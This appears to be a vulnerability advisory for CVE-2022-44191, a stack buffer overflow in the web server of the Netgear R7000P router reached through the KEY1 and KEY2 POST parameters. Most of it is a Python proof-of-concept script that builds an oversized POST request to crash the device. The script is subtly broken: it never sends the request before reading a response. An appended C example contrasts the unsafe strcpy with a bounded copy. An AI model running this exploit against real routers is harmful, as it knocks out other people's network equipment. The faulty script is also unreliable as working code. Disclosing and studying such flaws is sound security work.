

CVE-2022-44191: IoT_vuln/Netgear/R7000P/8 at main · RobinWang825/IoT_vuln

Netgear R7000P V1.3.1.64 is vulnerable to Buffer Overflow via parameters KEY1 and KEY2.


The stack overflow vulnerability is in /usr/sbin/httpd. The vulnerability occurs in the sub_5835C function, which can be accessed via the URL

This function accepts the POST parameter KEY1 without verifying its length and copies it into a stack buffer with strcpy, with no bound on the copy, which results in a stack overflow. This vulnerability allows an attacker to cause denial of service (DoS).

The same issue also occurs with the KEY2 parameter.

```python
import socket
import os

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

ip = ''
port = 80
r = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r.connect((ip, port))
rn = b'\r\n'
p1 = b'a' * 0x3000
p2 = b'KEY1=' + p1 # payload
p3 = b"POST /WLG_wireless_dual_band_r10.html" + b" HTTP/1.1" + rn
p3 += b"Host:" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) + rn
p3 += b'Content-Type: application/x-www-form-urlencoded' + rn
p3 += rn
p3 += p2

response = r.recv(4096)
response = response.decode()
li(response)
```
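The unchecked `strcpy` pattern described above, next to a bounded version that rejects an oversized KEY1/KEY2 value. This is an added example, not code from the router firmware or from the original report; the 64-byte buffer size and all function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define KEY_BUF_LEN 64 /* assumed; the page does not give the real buffer size */

/* Pattern the advisory describes: POST value copied into a fixed stack
 * buffer with no length check. Kept for contrast only, never called here. */
int handle_key_unsafe(const char *post_value)
{
    char key[KEY_BUF_LEN];
    strcpy(key, post_value);   /* writes past key[] once the value is >= 64 bytes */
    return (int)strlen(key);
}

/* Bounded copy: returns the value length, or -1 if it does not fit. */
int copy_param_checked(char *dst, size_t dst_len, const char *src)
{
    const char *nul;
    if (dst == NULL || dst_len == 0 || src == NULL)
        return -1;
    nul = memchr(src, '\0', dst_len);  /* scans at most dst_len bytes */
    if (nul == NULL) {                 /* value plus NUL does not fit */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return (int)(nul - src);
}

/* Hardened handler: reject an oversized KEY1/KEY2 instead of copying it. */
int handle_key_safe(const char *post_value)
{
    char key[KEY_BUF_LEN];
    if (copy_param_checked(key, sizeof key, post_value) < 0)
        return -1;             /* caller would reject the request here */
    return (int)strlen(key);
}

int main(void)
{
    static char big[0x3000 + 1];       /* constructed input, same length as the PoC value */
    memset(big, 'a', 0x3000);
    printf("normal value  -> %d\n", handle_key_safe("passphrase1"));
    printf("0x3000 bytes  -> %d\n", handle_key_safe(big));
    return 0;
}
```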
